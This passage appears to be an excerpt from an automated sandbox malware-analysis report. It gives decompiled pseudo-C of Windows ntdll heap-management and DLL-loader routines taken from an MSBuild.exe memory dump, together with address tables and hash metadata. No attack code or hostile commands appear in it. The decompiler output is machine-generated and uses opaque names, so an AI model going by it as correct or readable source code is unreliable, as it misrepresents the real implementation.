                                            									E0100B150();
                                            									_t260 = _t257 + 4;
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            									_t260 = _t257 + 8;
                                            								}
                                            								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                            								E0100B150();
                                            								_t257 = _t260 + 4;
                                            								__eflags =  *0x10f7bc8;
                                            								if(__eflags == 0) {
                                            									E010C2073(_t206, 1, _t251, __eflags);
                                            								}
                                            								_t235 = _v24;
                                            							}
                                            						}
                                            					}
                                            				}
                                            				_t134 =  *((intOrPtr*)(_t256 + 6));
                                            				if(_t134 == 0) {
                                            					_t210 = _t206;
                                            					_v48 = _t206;
                                            				} else {
                                            					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                            					_v48 = _t210;
                                            				}
                                            				_v5 =  *(_t256 + 2);
                                            				do {
                                            					if(_t235 > 0xfe00) {
                                            						_v12 = 0xfe00;
                                            						__eflags = _t235 - 0xfe01;
                                            						if(_t235 == 0xfe01) {
                                            							_v12 = 0xfdf0;
                                            						}
                                            						_t138 = 0;
                                            					} else {
                                            						_v12 = _t235 & 0x0000ffff;
                                            						_t138 = _v5;
                                            					}
                                            					 *(_t256 + 2) = _t138;
                                            					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                            					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                            					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                            						_t141 = 0;
                                            					} else {
                                            						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                            						_v40 = _t141;
                                            						if(_t141 >= 0xfe) {
                                            							_push(_t210);
                                            							E010CA80D(_t236, _t256, _t210, 0);
                                            							_t141 = _v40;
                                            						}
                                            					}
                                            					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                            					 *((char*)(_t256 + 6)) = _t141;
                                            					_t142 = _v12;
                                            					 *_t256 = _t142;
                                            					 *(_t256 + 3) = 0;
                                            					_t211 = _t142 & 0x0000ffff;
                                            					 *((char*)(_t256 + 7)) = 0;
                                            					_v20 = _t211;
                                            					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                            						_t119 = _t256 + 0x10; // -8
                                            						E0105D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                            						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                            						_t211 = _v20;
                                            					}
                                            					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                            					if(_t252 == 0) {
                                            						L56:
                                            						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                            						_t146 = _t206 + 0xc0;
                                            						goto L19;
                                            					} else {
                                            						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                            							L15:
                                            							_t185 = _t211;
                                            							goto L17;
                                            						} else {
                                            							while(1) {
                                            								_t187 =  *_t252;
                                            								if(_t187 == 0) {
                                            									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                            									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                            									goto L17;
                                            								}
                                            								_t252 = _t187;
                                            								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                            									continue;
                                            								}
                                            								goto L15;
                                            							}
                                            							while(1) {
                                            								L17:
                                            								_t212 = E0102AB40(_t206, _t252, 1, _t185, _t211);
                                            								if(_t212 != 0) {
                                            									_t146 = _t206 + 0xc0;
                                            									break;
                                            								}
                                            								_t252 =  *_t252;
                                            								_t211 = _v20;
                                            								_t185 =  *(_t252 + 0x14);
                                            							}
                                            							L19:
                                            							if(_t146 != _t212) {
                                            								_t237 =  *(_t206 + 0x4c);
                                            								_t253 = _v20;
                                            								while(1) {
                                            									__eflags = _t237;
                                            									if(_t237 == 0) {
                                            										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                            									} else {
                                            										_t184 =  *(_t212 - 8);
                                            										_t237 =  *(_t206 + 0x4c);
                                            										__eflags = _t184 & _t237;
                                            										if((_t184 & _t237) != 0) {
                                            											_t184 = _t184 ^  *(_t206 + 0x50);
                                            											__eflags = _t184;
                                            										}
                                            										_t147 = _t184 & 0x0000ffff;
                                            									}
                                            									__eflags = _t253 - (_t147 & 0x0000ffff);
                                            									if(_t253 <= (_t147 & 0x0000ffff)) {
                                            										goto L20;
                                            									}
                                            									_t212 =  *_t212;
                                            									__eflags = _t206 + 0xc0 - _t212;
                                            									if(_t206 + 0xc0 != _t212) {
                                            										continue;
                                            									} else {
                                            										goto L20;
                                            									}
                                            									goto L56;
                                            								}
                                            							}
                                            							L20:
                                            							_t149 =  *((intOrPtr*)(_t212 + 4));
                                            							_t33 = _t256 + 8; // -16
                                            							_t238 = _t33;
                                            							_t254 =  *_t149;
                                            							if( *_t149 != _t212) {
                                            								_push(_t212);
                                            								E010CA80D(0, _t212, 0, _t254);
                                            							} else {
                                            								 *_t238 = _t212;
                                            								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                            								 *_t149 = _t238;
                                            								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                            							}
                                            							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                            							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                            							if(_t255 == 0) {
                                            								L36:
                                            								if( *(_t206 + 0x4c) != 0) {
                                            									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                            									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                            								}
                                            								_t210 = _v48;
                                            								_t251 = _v12 & 0x0000ffff;
                                            								_t131 = _v20;
                                            								_t235 = _v24 - _t131;
                                            								_v24 = _t235;
                                            								_t256 = _t256 + _t131 * 8;
                                            								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                            									goto L41;
                                            								} else {
                                            									goto L39;
                                            								}
                                            							} else {
                                            								_t216 =  *_t256 & 0x0000ffff;
                                            								_v28 = _t216;
                                            								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                            									L28:
                                            									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                            									_v32 = _t242;
                                            									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                            										_t167 = _t242 + _t242;
                                            									} else {
                                            										_t167 = _t242;
                                            									}
                                            									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                            									_t168 = _t167 << 2;
                                            									_v40 = _t168;
                                            									_t206 = _v44;
                                            									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                            									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                            										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                            									}
                                            									_t217 = _v16;
                                            									if(_t217 != 0) {
                                            										_t173 = _t217 - 8;
                                            										_v52 = _t173;
                                            										_t174 =  *_t173;
                                            										__eflags =  *(_t206 + 0x4c);
                                            										if( *(_t206 + 0x4c) != 0) {
                                            											_t245 =  *(_t206 + 0x50) ^ _t174;
                                            											_v36 = _t245;
                                            											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                            											__eflags = _t245 >> 0x18 - _t225;
                                            											if(_t245 >> 0x18 != _t225) {
                                            												_push(_t225);
                                            												E010CA80D(_t206, _v52, 0, 0);
                                            											}
                                            											_t174 = _v36;
                                            											_t217 = _v16;
                                            											_t242 = _v32;
                                            										}
                                            										_v28 = _v28 - (_t174 & 0x0000ffff);
                                            										__eflags = _v28;
                                            										if(_v28 > 0) {
                                            											goto L34;
                                            										} else {
                                            											goto L33;
                                            										}
                                            									} else {
                                            										L33:
                                            										_t58 = _t256 + 8; // -16
                                            										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                            										_t206 = _v44;
                                            										_t217 = _v16;
                                            										L34:
                                            										if(_t217 == 0) {
                                            											asm("bts eax, edx");
                                            										}
                                            										goto L36;
                                            									}
                                            								} else {
                                            									goto L24;
                                            								}
                                            								while(1) {
                                            									L24:
                                            									_t182 =  *_t255;
                                            									if(_t182 == 0) {
                                            										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                            										__eflags = _t216;
                                            										goto L28;
                                            									}
                                            									_t255 = _t182;
                                            									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                            										continue;
                                            									} else {
                                            										goto L28;
                                            									}
                                            								}
                                            								goto L28;
                                            							}
                                            						}
                                            					}
                                            					L39:
                                            				} while (_t235 != 0);
                                            				_t214 = _v12;
                                            				_t131 =  *(_t206 + 0x54) ^ _t214;
                                            				 *(_t256 + 4) = _t131;
                                            				if(_t214 == 0) {
                                            					__eflags =  *0x10f8748 - 1;
                                            					if( *0x10f8748 >= 1) {
                                            						_t127 = _t256 + 0xfff; // 0xfff
                                            						_t131 = _t127 & 0xfffff000;
                                            						__eflags = _t131 - _t256;
                                            						if(_t131 != _t256) {
                                            							_t156 =  *[fs:0x30];
                                            							__eflags =  *(_t156 + 0xc);
                                            							if( *(_t156 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E0100B150();
                                            							} else {
                                            								E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                            							_t131 = E0100B150();
                                            							__eflags =  *0x10f7bc8;
                                            							if(__eflags == 0) {
                                            								_t131 = E010C2073(_t206, 1, _t251, __eflags);
                                            							}
                                            						}
                                            					}
                                            				}
                                            				goto L41;
                                            			}























































                                            0x0102a83a
                                            0x0102a83c
                                            0x0102a83e
                                            0x0102a841
                                            0x0102a844
                                            0x0102a84a
                                            0x0102aa53
                                            0x0102aa59
                                            0x0102aa59
                                            0x0102a858
                                            0x0102a85e
                                            0x0102aaf5
                                            0x0102aafc
                                            0x0107229e
                                            0x010722a2
                                            0x010722a8
                                            0x010722b3
                                            0x010722b5
                                            0x010722bb
                                            0x010722c1
                                            0x010722c5
                                            0x010722e6
                                            0x010722eb
                                            0x010722f0
                                            0x010722c7
                                            0x010722dc
                                            0x010722e1
                                            0x010722e1
                                            0x010722f3
                                            0x010722f8
                                            0x010722fd
                                            0x01072300
                                            0x01072307
                                            0x0107230e
                                            0x0107230e
                                            0x01072313
                                            0x01072313
                                            0x010722b5
                                            0x010722a2
                                            0x0102aafc
                                            0x0102a864
                                            0x0102a869
                                            0x0102aa5c
                                            0x0102aa5e
                                            0x0102a86f
                                            0x0102a87f
                                            0x0102a885
                                            0x0102a885
                                            0x0102a88b
                                            0x0102a890
                                            0x0102a896
                                            0x0102ab0c
                                            0x0102ab0f
                                            0x0102ab15
                                            0x01072320
                                            0x01072320
                                            0x0102ab1b
                                            0x0102a89c
                                            0x0102a89f
                                            0x0102a8a2
                                            0x0102a8a2
                                            0x0102a8a5
                                            0x0102a8af
                                            0x0102a8b3
                                            0x0102a8b8
                                            0x0102aa66
                                            0x0102a8be
                                            0x0102a8c5
                                            0x0102a8c6
                                            0x0102a8ce
                                            0x01072328
                                            0x01072332
                                            0x01072337
                                            0x01072337
                                            0x0102a8ce
                                            0x0102a8d4
                                            0x0102a8d8
                                            0x0102a8db
                                            0x0102a8de
                                            0x0102a8e1
                                            0x0102a8e5
                                            0x0102a8e8
                                            0x0102a8f0
                                            0x0102a8f3
                                            0x0107234c
                                            0x01072350
                                            0x01072355
                                            0x01072359
                                            0x01072359
                                            0x0102a8f9
                                            0x0102a901
                                            0x0102aae4
                                            0x0102aae4
                                            0x0102aaea
                                            0x00000000
                                            0x0102a907
                                            0x0102a90a
                                            0x0102a91d
                                            0x0102a91d
                                            0x00000000
                                            0x0102a910
                                            0x0102a910
                                            0x0102a910
                                            0x0102a914
                                            0x0102a924
                                            0x0102a924
                                            0x0102a924
                                            0x0102a924
                                            0x0102a916
                                            0x0102a91b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0102a91b
                                            0x0102a925
                                            0x0102a925
                                            0x0102a932
                                            0x0102a936
                                            0x0102a93c
                                            0x0102a93c
                                            0x0102a93c
                                            0x0102ab22
                                            0x0102ab24
                                            0x0102ab27
                                            0x0102ab27
                                            0x0102a942
                                            0x0102a944
                                            0x0102aaba
                                            0x0102aabd
                                            0x0102aac0
                                            0x0102aac0
                                            0x0102aac2
                                            0x0102ab2f
                                            0x0102aac4
                                            0x0102aac4
                                            0x0102aac7
                                            0x0102aaca
                                            0x0102aacc
                                            0x0102aace
                                            0x0102aace
                                            0x0102aace
                                            0x0102aad1
                                            0x0102aad1
                                            0x0102aad7
                                            0x0102aad9
                                            0x00000000
                                            0x00000000
                                            0x01072361
                                            0x01072369
                                            0x0107236b
                                            0x00000000
                                            0x01072371
                                            0x00000000
                                            0x01072371
                                            0x00000000
                                            0x0107236b
                                            0x0102aac0
                                            0x0102a94a
                                            0x0102a94a
                                            0x0102a94d
                                            0x0102a94d
                                            0x0102a950
                                            0x0102a954
                                            0x01072376
                                            0x01072380
                                            0x0102a95a
                                            0x0102a95a
                                            0x0102a95c
                                            0x0102a95f
                                            0x0102a961
                                            0x0102a961
                                            0x0102a967
                                            0x0102a96a
                                            0x0102a972
                                            0x0102aa02
                                            0x0102aa06
                                            0x0102aa10
                                            0x0102aa16
                                            0x0102aa16
                                            0x0102aa1b
                                            0x0102aa21
                                            0x0102aa24
                                            0x0102aa27
                                            0x0102aa29
                                            0x0102aa2c
                                            0x0102aa32
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0102a978
                                            0x0102a978
                                            0x0102a97b
                                            0x0102a981
                                            0x0102a996
                                            0x0102a998
                                            0x0102a99f
                                            0x0102a9a2
                                            0x0107238a
                                            0x0102a9a8
                                            0x0102a9a8
                                            0x0102a9a8
                                            0x0102a9aa
                                            0x0102a9ad
                                            0x0102a9b0
                                            0x0102a9bb
                                            0x0102a9be
                                            0x0102a9c7
                                            0x0102a9c9
                                            0x0102a9c9
                                            0x0102a9cc
                                            0x0102a9d1
                                            0x0102aa6d
                                            0x0102aa70
                                            0x0102aa73
                                            0x0102aa75
                                            0x0102aa79
                                            0x0102aa7e
                                            0x0102aa82
                                            0x0102aa8f
                                            0x0102aa94
                                            0x0102aa96
                                            0x01072392
                                            0x010723a1
                                            0x010723a1
                                            0x0102aa9c
                                            0x0102aa9f
                                            0x0102aaa2
                                            0x0102aaa2
                                            0x0102aaa8
                                            0x0102aaab
                                            0x0102aaaf
                                            0x00000000
                                            0x0102aab5
                                            0x00000000
                                            0x0102aab5
                                            0x0102a9d7
                                            0x0102a9d7
                                            0x0102a9da
                                            0x0102a9e0
                                            0x0102a9e3
                                            0x0102a9e6
                                            0x0102a9e9
                                            0x0102a9eb
                                            0x0102a9fd
                                            0x0102a9fd
                                            0x00000000
                                            0x0102a9eb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0102a983
                                            0x0102a983
                                            0x0102a983
                                            0x0102a987
                                            0x0102a995
                                            0x0102a995
                                            0x0102a995
                                            0x0102a995
                                            0x0102a989
                                            0x0102a98e
                                            0x00000000
                                            0x0102a990
                                            0x00000000
                                            0x0102a990
                                            0x0102a98e
                                            0x00000000
                                            0x0102a983
                                            0x0102a972
                                            0x0102a90a
                                            0x0102aa34
                                            0x0102aa34
                                            0x0102aa40
                                            0x0102aa43
                                            0x0102aa46
                                            0x0102aa4d
                                            0x010723ab
                                            0x010723b2
                                            0x010723b8
                                            0x010723be
                                            0x010723c3
                                            0x010723c5
                                            0x010723cb
                                            0x010723d1
                                            0x010723d5
                                            0x010723f6
                                            0x010723fb
                                            0x010723d7
                                            0x010723ec
                                            0x010723f1
                                            0x01072403
                                            0x01072408
                                            0x01072410
                                            0x01072417
                                            0x01072422
                                            0x01072422
                                            0x01072417
                                            0x010723c5
                                            0x010723b2
                                            0x00000000

                                            Strings
                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01072403
                                            • HEAP: , xrefs: 010722E6, 010723F6
                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010722F3
                                            • HEAP[%wZ]: , xrefs: 010722D7, 010723E7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                            • API String ID: 0-1657114761
                                            • Opcode ID: 4b935887a3c7eb4056514385d4d06eeb4d9b72d077b85f9f7901580e652d0453
                                            • Instruction ID: d9547e6a0143f4d1414a16f619f291db8139885d5b55ec376e3b8f43f806d60b
                                            • Opcode Fuzzy Hash: 4b935887a3c7eb4056514385d4d06eeb4d9b72d077b85f9f7901580e652d0453
                                            • Instruction Fuzzy Hash: EAD1CD34B00656DFDB19CF68C490BBAB7F1BF48300F1485A9D9CA9BB42EB34A845CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 69%
                                            			E0102A229(void* __ecx, void* __edx) {
                                            				signed int _v20;
                                            				char _v24;
                                            				char _v28;
                                            				void* _v44;
                                            				void* _v48;
                                            				void* _v56;
                                            				void* _v60;
                                            				void* __ebx;
                                            				signed int _t55;
                                            				signed int _t57;
                                            				void* _t61;
                                            				intOrPtr _t62;
                                            				void* _t65;
                                            				void* _t71;
                                            				signed char* _t74;
                                            				intOrPtr _t75;
                                            				signed char* _t80;
                                            				intOrPtr _t81;
                                            				void* _t82;
                                            				signed char* _t85;
                                            				signed char _t91;
                                            				void* _t103;
                                            				void* _t105;
                                            				void* _t121;
                                            				void* _t129;
                                            				signed int _t131;
                                            				void* _t133;
                                            
                                            				_t105 = __ecx;
                                            				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                            				_t103 = __edx;
                                            				_t129 = __ecx;
                                            				E0102DF24(__edx,  &_v28, _t133);
                                            				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                            				asm("sbb edi, edi");
                                            				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                            				if(_t55 != 0) {
                                            					_push(0);
                                            					_push(0x14);
                                            					_push( &_v24);
                                            					_push(3);
                                            					_push(_t129);
                                            					_push(0xffffffff);
                                            					_t57 = E01049730();
                                            					__eflags = _t57;
                                            					if(_t57 < 0) {
                                            						L17:
                                            						_push(_t105);
                                            						E010CA80D(_t129, 1, _v20, 0);
                                            						_t121 = 4;
                                            						goto L1;
                                            					}
                                            					__eflags = _v20 & 0x00000060;
                                            					if((_v20 & 0x00000060) == 0) {
                                            						goto L17;
                                            					}
                                            					__eflags = _v24 - _t129;
                                            					if(_v24 == _t129) {
                                            						goto L1;
                                            					}
                                            					goto L17;
                                            				}
                                            				L1:
                                            				_push(_t121);
                                            				_push(0x1000);
                                            				_push(_t133 + 0x14);
                                            				_push(0);
                                            				_push(_t133 + 0x20);
                                            				_push(0xffffffff);
                                            				_t61 = E01049660();
                                            				_t122 = _t61;
                                            				if(_t61 < 0) {
                                            					_t62 =  *[fs:0x30];
                                            					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                            					__eflags =  *(_t62 + 0xc);
                                            					if( *(_t62 + 0xc) == 0) {
                                            						_push("HEAP: ");
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push( *((intOrPtr*)(_t133 + 0xc)));
                                            					_push( *((intOrPtr*)(_t133 + 0x14)));
                                            					_push(_t129);
                                            					E0100B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                            					_t65 = 0;
                                            					L13:
                                            					return _t65;
                                            				}
                                            				_t71 = E01027D50();
                                            				_t124 = 0x7ffe0380;
                                            				if(_t71 != 0) {
                                            					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				} else {
                                            					_t74 = 0x7ffe0380;
                                            				}
                                            				if( *_t74 != 0) {
                                            					_t75 =  *[fs:0x30];
                                            					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                            					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                            						E010C138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                            					}
                                            				}
                                            				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                            				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                            				if(E01027D50() != 0) {
                                            					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				} else {
                                            					_t80 = _t124;
                                            				}
                                            				if( *_t80 != 0) {
                                            					_t81 =  *[fs:0x30];
                                            					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                            					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                            						__eflags = E01027D50();
                                            						if(__eflags != 0) {
                                            							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            						}
                                            						E010C1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                            					}
                                            				}
                                            				_t82 = E01027D50();
                                            				_t125 = 0x7ffe038a;
                                            				if(_t82 != 0) {
                                            					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            				} else {
                                            					_t85 = 0x7ffe038a;
                                            				}
                                            				if( *_t85 != 0) {
                                            					__eflags = E01027D50();
                                            					if(__eflags != 0) {
                                            						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            					}
                                            					E010C1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                            				}
                                            				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                            				_t91 =  *(_t103 + 2);
                                            				if((_t91 & 0x00000004) != 0) {
                                            					E0105D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                            					_t91 =  *(_t103 + 2);
                                            				}
                                            				 *(_t103 + 2) = _t91 & 0x00000017;
                                            				_t65 = 1;
                                            				goto L13;
                                            			}






























                                            0x0102a229
                                            0x0102a231
                                            0x0102a23f
                                            0x0102a242
                                            0x0102a244
                                            0x0102a24c
                                            0x0102a255
                                            0x0102a25a
                                            0x0102a25f
                                            0x01071c76
                                            0x01071c78
                                            0x01071c7e
                                            0x01071c7f
                                            0x01071c81
                                            0x01071c82
                                            0x01071c84
                                            0x01071c89
                                            0x01071c8b
                                            0x01071c9e
                                            0x01071c9e
                                            0x01071cab
                                            0x01071cb2
                                            0x00000000
                                            0x01071cb2
                                            0x01071c8d
                                            0x01071c92
                                            0x00000000
                                            0x00000000
                                            0x01071c94
                                            0x01071c98
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01071c98
                                            0x0102a265
                                            0x0102a265
                                            0x0102a266
                                            0x0102a26f
                                            0x0102a270
                                            0x0102a276
                                            0x0102a277
                                            0x0102a279
                                            0x0102a27e
                                            0x0102a282
                                            0x01071db5
                                            0x01071dbb
                                            0x01071dc1
                                            0x01071dc5
                                            0x01071de4
                                            0x01071de9
                                            0x01071dc7
                                            0x01071ddc
                                            0x01071de1
                                            0x01071def
                                            0x01071df3
                                            0x01071df7
                                            0x01071dfe
                                            0x01071e06
                                            0x0102a302
                                            0x0102a308
                                            0x0102a308
                                            0x0102a288
                                            0x0102a28d
                                            0x0102a294
                                            0x01071cc1
                                            0x0102a29a
                                            0x0102a29a
                                            0x0102a29a
                                            0x0102a29f
                                            0x01071ccb
                                            0x01071cd1
                                            0x01071cd8
                                            0x01071cea
                                            0x01071cea
                                            0x01071cd8
                                            0x0102a2a9
                                            0x0102a2af
                                            0x0102a2bc
                                            0x01071cfd
                                            0x0102a2c2
                                            0x0102a2c2
                                            0x0102a2c2
                                            0x0102a2c7
                                            0x01071d07
                                            0x01071d0d
                                            0x01071d14
                                            0x01071d1f
                                            0x01071d21
                                            0x01071d2c
                                            0x01071d2c
                                            0x01071d2c
                                            0x01071d47
                                            0x01071d47
                                            0x01071d14
                                            0x0102a2cd
                                            0x0102a2d2
                                            0x0102a2d9
                                            0x01071d5a
                                            0x0102a2df
                                            0x0102a2df
                                            0x0102a2df
                                            0x0102a2e4
                                            0x01071d69
                                            0x01071d6b
                                            0x01071d76
                                            0x01071d76
                                            0x01071d76
                                            0x01071d91
                                            0x01071d91
                                            0x0102a2ea
                                            0x0102a2f0
                                            0x0102a2f5
                                            0x01071da8
                                            0x01071dad
                                            0x01071dad
                                            0x0102a2fd
                                            0x0102a300
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                            • API String ID: 2994545307-2586055223
                                            • Opcode ID: 9ec39d9ffb24cb01884901945547e51ef2420fe96cca900f7e7d56be5858aa69
                                            • Instruction ID: b42fd060b67471d53983e3e1f449ec3a6a069932137644465781a8a18e8e1ddc
                                            • Opcode Fuzzy Hash: 9ec39d9ffb24cb01884901945547e51ef2420fe96cca900f7e7d56be5858aa69
                                            • Instruction Fuzzy Hash: 2B51F532604691DFE322EB68C844F6B77E9FB94B50F0904A8F5D58B2D2DB34D904CB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 44%
                                            			E01038E00(void* __ecx) {
                                            				signed int _v8;
                                            				char _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t32;
                                            				intOrPtr _t35;
                                            				intOrPtr _t43;
                                            				void* _t46;
                                            				intOrPtr _t47;
                                            				void* _t48;
                                            				signed int _t49;
                                            				void* _t50;
                                            				intOrPtr* _t51;
                                            				signed int _t52;
                                            				void* _t53;
                                            				intOrPtr _t55;
                                            
                                            				_v8 =  *0x10fd360 ^ _t52;
                                            				_t49 = 0;
                                            				_t48 = __ecx;
                                            				_t55 =  *0x10f8464; // 0x76690110
                                            				if(_t55 == 0) {
                                            					L9:
                                            					if( !_t49 >= 0) {
                                            						if(( *0x10f5780 & 0x00000003) != 0) {
                                            							E01085510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                            						}
                                            						if(( *0x10f5780 & 0x00000010) != 0) {
                                            							asm("int3");
                                            						}
                                            					}
                                            					return E0104B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                            				}
                                            				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                            				_t43 =  *0x10f7984; // 0xac2bd8
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                            					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                            					if(_t48 == _t43) {
                                            						_t50 = 0x5c;
                                            						if( *_t32 == _t50) {
                                            							_t46 = 0x3f;
                                            							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                            								_t32 = _t32 + 8;
                                            							}
                                            						}
                                            					}
                                            					_t51 =  *0x10f8464; // 0x76690110
                                            					 *0x10fb1e0(_t47, _t32,  &_v12);
                                            					_t49 =  *_t51();
                                            					if(_t49 >= 0) {
                                            						L8:
                                            						_t35 = _v12;
                                            						if(_t35 != 0) {
                                            							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                            								E01039B10( *((intOrPtr*)(_t48 + 0x48)));
                                            								_t35 = _v12;
                                            							}
                                            							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                            						}
                                            						goto L9;
                                            					}
